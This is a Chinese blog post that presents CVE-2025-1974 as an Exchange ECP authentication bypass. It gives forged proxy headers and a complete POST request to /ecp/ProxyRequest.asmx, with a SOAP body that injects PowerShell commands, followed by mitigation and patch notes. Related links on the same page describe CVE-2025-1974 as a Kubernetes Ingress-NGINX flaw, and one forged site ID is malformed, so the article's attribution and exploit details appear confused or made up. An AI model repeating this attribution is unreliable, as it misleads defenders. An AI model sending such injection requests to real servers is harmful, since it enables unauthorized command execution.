详解CVE-2025-1974 ECP(Exchange 管理中心)身份认证绕过漏洞以及涉及知识点解析

原创 已于 2025-11-17 17:11:46 修改 · 827 阅读 · 31 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #microsoft

于 2025-11-17 16:56:06 首次发布

漏洞存在场景:

  • Exchange Server 2016 Cumulative Update 25 及以下;
  • Exchange Server 2019 Cumulative Update 14 及以下;
  • 未安装 2025 年 9 月微软安全更新(KB5048234/KB5048235)的本地部署版本;
  • EXChange server开启ECP接口,默认为443端口,最好实际为多站点部署;
  • 对访问ECP无任何前置权限设置;

实现原理概述:

基于Exchange server多站点场景中,进行跨站访问的时候,由于简化认证流程,避免重复认证, 如果服务器判定为跨站访问,此时如果你的令牌合法(无论有效不有效),则就会免认证访问,通过此方法来实现身份认证绕过,并可执行恶意代码;

关键点

什么是跨站访问,如何使其判定为跨站访问

实现详解:

Exchange server 的多站点部署:

为提升邮件系统的异地办公或优化跨区域访问,比如企业在多地各有办公区域,为避免单站点故障导致邮件系统瘫痪,会在两地部署 Exchange 服务器,组成数据库可用性组(DAG)。当某一站点服务器故障时,另外站点的数据库副本可自动接管,保障业务连续。

那什么是跨站访问:

其实就是服务器之间自动转发用户请求的机制,比如用户访问 A 站点的 OWA/ECP/EWS 接口,但邮箱数据实际存储在 B 站点的服务器上,此时 A 站点会作为 “代理服务器”,将请求转发到 B 站点,再把 B 站点的响应返回给用户,用户无需手动切换访问地址。

漏洞触发点:

为了避免重复认证,在 A 站点会作为 “代理服务器”,将请求转发到 B 站点的时候,会进行免认证处理,因为此时服务器会认为此步骤是经过前端认证过的,前端认证后,会生成一个令牌,此时只会检查令牌是否合法,就会允许通行;

下图为正常的多站点访问流程:

                               

下一个关键点,怎么判定为跨站访问:

主动访问Exchange server 的/ecp/ProxyRequest.asmx ,此端点为专门处理 “跨站点请求转发” 的接口端点,并同时伪造传入参数:

X-CommonAccessToken: sjqid123!@# 任意无效令牌(可自定义,随机字符串即可)
X-ProxyContext: EWS  # 设置为EWS的请求,ews代表的是数据交互的api接口,会频繁使用ecp的代理接口,当ecp收到ews的请求后,默认会启用优先代理的逻辑;
X-Exchange-BackendServer: xxx.xxx.com  # 伪造的异站服务器地址,填一个 “看似属于其他站点” 的地址(无需真实存在,格式合法即可),
X-SiteContext: 00000000-0000-0000-0000-0000000031201  # 固定伪造站点ID,提升兼容性

下图为漏洞的实现逻辑:

上图步骤二中的OwaEcpProxyRequestHandler组件就是在跨站访问的时候使用的,这个组件在处理跨站点代理请求时,对X-CommonAccessToken令牌的校验逻辑不严谨,仅简单检查令牌格式是否存在,而非验证令牌的签名、有效期和合法性,导致无效令牌被误判为合法,直接绕过身份验证;

如上图所示,如果绕过身份认证之后,就可携带恶意指令执行相应的操作;

那恶意代码怎么携带实现呢?

同样也是在伪造的跨站请求包中,放在请求体中,通过SOAP(简单对象访问协议)携带;

那什么是SOAP,格式是什么样的?

SOAP:基于 XML 的跨平台、跨语言的通信协议;

不同系统(像说不同语言的人)要沟通,SOAP 就是一套 “标准化邮件格式”—— 不管双方底层用什么技术,只要按这个格式发 “邮件”(请求),对方就能看懂并回复(响应)。

格式大体为:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header/>
  <soapenv:Body>
    <ProxyRequest xmlns="http://schemas.microsoft.com/exchange/services/2006/messages">
      <cmdlet>Get-Mailbox; Write-Host "xxx;</cmdlet>
      <parameters/>
      <proxyContext>EWS</proxyContext>
      <culture>en-US</culture>
      <uiCulture>en-US</uiCulture>
    </ProxyRequest>
  </soapenv:Body>
</soapenv:Envelope>
  • <soapenv:Envelope>:SOAP 信封根标签,定义了命名空间 http://schemas.xmlsoap.org/soap/envelope/(SOAP 1.1 标准命名空间);
  • <soapenv:Header>:SOAP 消息头,用于携带请求元数据(如请求类型、授权信息);
  • <soapenv:Body>:SOAP 消息体。

  • <ProxyRequest>:是 Exchange EWS 代理接口的标准请求标签;

  • <cmdlet>:核心命令执行标签,Exchange 接口会将标签内的字符串当作 PowerShell 命令 执行
  • <parameters/>:用于传递 <cmdlet> 命令的参数(如 Get-Mailbox -Identity "user@company.com"),此处无额外参数,仅执行命令本身。
  • <proxyContext>:声明代理请求的上下文是 “EWS”(Exchange Web Services),告诉 Exchange 服务器 “通过 EWS 服务处理该命令”,是接口必需参数。

即此时就可以伪造数据包完成身份认证绕过,示例为:

POST /ecp/ProxyRequest.asmx HTTP/1.1
Host: mail.xxx.com  # 替换为你的Exchange服务器统一入口域名
X-CommonAccessToken: invalid_token_abc123!@#  # 任意无效令牌(可自定义,随机字符串即可)
X-ProxyContext: EWS  # 固定值,触发跨站代理校验逻辑(漏洞核心触发点)
X-Exchange-BackendServer: mail.xxx.com  # 强化跨站代理场景伪装
X-SiteContext: 00000000-0000-0000-0000-000000000001  # 固定伪造站点ID,提升兼容性
Content-Type: text/xml; charset=utf-8
Content-Length: 558  # 无需手动修改
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: Keep-Alive
Accept-Encoding: gzip, deflate

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header/>
  <soapenv:Body>
    <ProxyRequest xmlns="http://schemas.microsoft.com/exchange/services/2006/messages">
      <cmdlet>Get-Mailbox; Write-Host "代码“;</cmdlet>
      <parameters/>
      <proxyContext>EWS</proxyContext>
      <culture>en-US</culture>
      <uiCulture>en-US</uiCulture>
    </ProxyRequest>
  </soapenv:Body>
</soapenv:Envelope>

临时防护措施:

  1. 临时阻断 ECP 访问:若暂时无法安装补丁,通过防火墙 / IPS 拦截外部对 https://xxxxx/ecp/ 的访问(仅允许内网管理员访问);
  2. 通过 Exchange 日志(路径:C:\Program Files\Microsoft\Exchange Server\V15\Logging\OwaEcpProxy)监控包含 X-CommonAccessToken 头且 cmdlet 参数包含 ; | 等特殊字符的请求;
  3. 禁用不必要的跨站点代理:通过 PowerShell 命令禁用 ECP 对 EWS 的跨站点代理(仅适用于单站点部署):

漏洞的解决方式:

1、立即安装微软 2025 年 9 月安全更新(Exchange 2016:KB5048234;Exchange 2019:KB5048235);

修复原理:

  1. 强化令牌校验:修改 OwaEcpProxyRequestHandler 组件的 X-CommonAccessToken 解析逻辑,严格校验令牌的签名、格式和有效期,拒绝无效令牌绕过认证;
  2. 限制命令执行范围:对 ECP 接口的 cmdlet 参数添加 “白名单校验”,仅允许执行预设的 Exchange 管理命令,禁止拼接任意 PowerShell 代码,阻断代码注入路径。

结语:

以上理论为基于公开漏洞分析、安全社区披露的 POC 逻辑进行总结整理,仅为作者自己的学习思路,仅供参考学习;

Kubernetes Ingress-NGINX Controller 存在未授权远程代码执行漏洞(CVE-2025-1974)
m0_50125527的博客
04-03 554
Ingress-NGINX 是 Kubernetes 中基于 NGINX 的官方 Ingress 控制器,用于管理集群入口流量。它通过监听 Kubernetes Ingress 资源规则,动态配置 NGINX 作为反向代理和负载均衡器,支持路径路由、TLS 终止、域名映射等特性,是生产环境中常用的高性能、可扩展的流量管理解决方案。
CVE-2025-1974 - Ingress NGINX 9.8 中存在严重未经身份验证的远程代码执行漏洞
技术超强的网络安全平台
04-27 1338
Ingress NGINX 控制器是 Kubernetes 上最受欢迎的入口控制器之一,也是 Kubernetes 的核心项目,在GitHub上拥有超过 18,000 颗星。使用 Ingress-NGINX 是向外部公开 Kubernetes 应用程序的最常用方法之一。作为入口控制器,它的工作是接受传入的流量并将其路由到相关的 Kubernetes 服务,然后服务会根据一组规则将流量转发到相应的 Pod。具体来说,Ingress NGINX 控制器基于流行的NGINX 反向代理。
【云安全】云原生- K8S IngressNightmare CVE-2025-1974漏洞复现完整教程)
仇辉攻防的博客
04-17 2378
由于我这里的环境是模拟失陷POD(贴近实际),属于集群内部网络访问,无需端口转发,用第6、7行的URL即可,注释12、13行;编译前,先了解ingress-nginx controller执行.so文件依赖的库版本,编译时指定同样的库版本。版本选择:先看Ingress漏洞版本,倒推K8S版本,参考ingress-nginx官方适配表。我之前搭过一版K8S,是1.23.6,因此对应安装1.6.4的ingress,处于漏洞版本内。同样,看一下编译的机器库版本,发现有3版本可以用。
Ingress NGINX 控制器中存在严重漏洞可导致RCE
smellycat000的专栏
03-25 1360
这些漏洞CVE-2025-24513、CVE-2025-24514、CVE-2025-1097、CVE-2025-1098和CVE-2025-1974)的CVSS评分为9.8,被Wiz 公司命名为 “IngressNightmare”。Wiz 公司的云安全研究员 Hillai Ben-Sasson 提到,该攻击链主要涉及注入恶意配置,并利用它读取敏感文件和运行任意代码,从而导致攻击者滥用强Service Account,读取 Kubernetes 机密并最终导致接管集群。觉得不错,就点个 “
云原生周刊:Ingress-NGINX 漏洞
KubeSphere
03-25 2363
KubeSphere 已被 Aqara 智能家居、本来生活、东方通信、微宏科技、东软、华云、新浪、三一重工、华夏银行、四川航空、国药集团、微众银行、紫金保险、去哪儿网、中通、中国人民银行、中国银行、中国人保寿险、中国太平保险、中国移动、中国联通、中国电信、天翼云、中移金科、Radore、ZaloPay 等海内外数万家企业采用。Flyte 支持分布式计算、可重复性和高效的资源管理,使团队能够轻松地构建、运行和监控大规模的机器学习和数据分析工作流,支持多云和本地环境的部署。
红队专题-漏洞挖掘-代码审计
aming小老弟
03-11 1573
其中 Web A 为存在 CSRF 漏洞的网站,Web B 为攻击者构建的恶意网站,User C 为 Web A 网站的合法用户。用户 C 打开浏览器,访问受信任网站 A,输入用户名和密码请求登录网站A在用户信息通过验证后,网站 A 产生 Cookie 信息并返回给浏览器,此时用户登录网站 A 成功,可以正常发送请求到网站A用户未退出网站 A 之前,在同一浏览器中,打开一个 TAB 页访问网站 B网站 B 接收到用户请求后,返回一些攻击性代码,并发出一个请求要求访问第三方站点 A。
ESP32安全通信实战指南:3步搞定TLS握手流程,快速构建可信连接(新手必看)
重点介绍TLS在ESP32中的实现基础——mbedTLS库,以及安全通信所需的密码学前置知识,为后续深入理解握手流程与实战配置打下坚实基础。 # 2. TLS握手协议的理论解析 在现代物联网通信中,安全传输层(Transport ...
深度解析CVE-2025-1974:微软Exchange Server远程代码执行漏洞
从零开始,掌握网络安全。提供全面的网络安全教程、攻防演练技巧和行业动态。
11-09 776
微软Exchange高危漏洞CVE-2025-1974威胁全球企业安全 2025年9月,微软披露Exchange Server高危漏洞CVE-2025-1974(CVSS 9.8),影响2016/2019版本。该漏洞通过ECP接口身份验证绕过和代码注入,可实现远程无权限攻击,导致数据泄露、勒索病毒和内网渗透。金融、制造、政务等关键行业已遭针对性攻击。漏洞利用链包含侦察、恶意请求构造、代码执行等环节,攻击耗时不足10秒。微软已发布补丁修复验证逻辑和输入过滤,并提供临时缓解方案(网络隔离、URL重写规则)。建议
KUBERNETES INGRESS-NGINX远程代码执行(CVE-2025-1974)
swordheart的博客
05-22 175
KUBERNETES INGRESS-NGINX远程代码执行(CVE-2025-1974)
安全通报】Kubernetes Ingress-NGINX 执行漏洞CVE-2025-19742)风险通告
weixin_38320674的博客
05-16 1356
⚠️ 默认情况下,ingress-nginx 控制器具备读取整个集群中 Secrets 的能力,若被利用,可能导致集群被完全接管。控制器的严重安全漏洞。欢迎关注我的公众号「DevOps和k8s全栈技术」,进公众号【服务】栏,可以看到技术群,点击即可加入学习交流群。为 9.8,表示该漏洞在网络层面远程可利用、无需权限、无需用户交互,并能造成机密性、完整性与可用性高程度的破坏。欢迎关注我的公众号「DevOps和k8s全栈技术」,进公众号【服务】栏,可以看到技术群,点击即可加入学习交流群。
Kubernetes Ingress-NGINX Controller 存在未授权远程代码执行漏洞CVE-2025-1974
m0_47398713的博客
08-08 288
想看其他内容访问https://www.wlaqsys.com与https://pc.fenchuan8.com/#/index?
【邮件系统ECP
优快云Romance的博客
10-31 725
在邮件系统中,ECP 一般指的是 Exchange Control Panel,即 Exchange 管理控制面板。这是 Microsoft Exchange Server 提供的一种基于 Web 的管理工具,管理员和授权用户可以通过 ECP 来管理和配置邮件账户及相关功能。通常,Exchange 用户可以通过 https://<服务器地址>/ecp 访问 ECP 控制面板。
「Nginx漏洞复现与防御实战|2024最新CVE解析(含目录遍历/文件解析绕过/反向代理漏洞EXP复现+安全加固方案)渗透测试工程师必看」
盾悟
03-02 8967
通过访问config.do配置页面,先更改Work Home工作目录,用有效的已部署的Web应用目录替换默认的存储JKS Keystores文件的目录,之后使用"添加Keystore设置"的功能,可上传恶意的JSP脚本文件。而反序列话则是再把字节序列恢复为java对象的过程,然而就在这一转一变得过程中,程序员的过滤不严格,就可以导致恶意构造的代码的实现。IIS的短文件名机制,可以暴力猜解短文件名,访问构造的某个存在的短文件名,会返回404,访问构造的某个不存在的短文件名,返回400。
Exchange ECP
weixin_33892359的博客
01-09 462
转载于:https://blog.51cto.com/3854132/760377
Exchange 2013管理员账号登录ecp登陆不了
weixin_47347190的博客
11-06 2832
Exchange登录不了后台 目录 Exchange登录不了后台 如下图的问题,用管理员登录ex.hzz.com的后台时,登录不了,而另一个却可以登录 排错步骤: 先查看有关的exchange服务是否全部启动的,如果有没开启的就启动一下,之后登录试试,如果不行,可以接着下面的第二步 尝试用IIsreset的命令刷新一下,之所以这样的原因可能是iis的缓存占满了队列,导致后面的请求无法进入处理,解决的方法就是刷新iis的缓存,iisreset 再重新登录试试,更好,我下面的可以登录了 .
Exchange2013 ECP迁移用户提示错误(该用户没有Exchange邮箱)及解决方案
weixin_34357267的博客
11-27 579
近期公司做了一些系统升级服务,原有使用的是Exchange2010,然后想升级Exchange2013,但是由于考虑到服务的稳定及持续性,所以就在环境内部署了两台Exchange2013服务器,部署后,准备迁移用户的时候发现有点问题,在迁移用户的时候提示用户邮箱不存在,其实呢是真实存在的,所以在网上找一些解决方案,解决后总结了一下分享给有需要的朋友,我...
【Sql Server】sql server 2019设置远程访问,外网服务器需要设置好安全组入方向规则
最新发布
2509_94200811的博客
12-01 842
本地电脑安装的sql server数据库可视化工具ssms连接到外网服务器的sql server数据库,实现本地化远程链接数据库进行管理和操作。
软件供应链安全“黑洞”:2025安全合规的制品库如何选择?
weixin_44552837的博客
12-01 383
软件供应链攻击频发,依赖组件不可控、流转管控缺失等问题凸显制品管理风险,制品库亟需安全合规的产品选择。国产制品管理平台可构建全生命周期防御体系,以可信源建设、上传即扫描、全链路追溯及信创适配筑牢防线,是企业研发制品仓库的选型优选。
大模型生成(题目)安全
CSPhD-winston的博客
12-01 895
生成管道中加“自动验证器”(QA 模型交叉验证)、内容过滤器(toxicity / safety classifier)、可控生成(约束 prompt / planning),以及对抗训练来提高鲁棒性。可用指标:错误率(事实/逻辑)、不可答率(unanswerable)、有害性评分(自动 + 人工标签)、偏见强度(差异化统计)、选项/答案位置偏置、可解释性度量等。构建偏见题模板(性别/种族/阶级/文化敏感话题),通过语法/语义变换扩展(借鉴 JADE 型方法),评估不同模型在题目生成时露出的系统性偏差。
CVE-2025-59242 CVE-2025-47979 阿里云检测系统漏洞,这是什么漏洞
10-29
用户引用了四篇漏洞分析文章,但有趣的是这些引用内容和当前问题并无直接关联——CVE-2025-24513是Tomcat漏洞CVE-2025-32462是sudo提权漏洞CVE-2025-53534是RatPanel漏洞CVE-2025-27817是Kafka漏洞。...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符  | 博主筛选后可见
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

L_zook

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值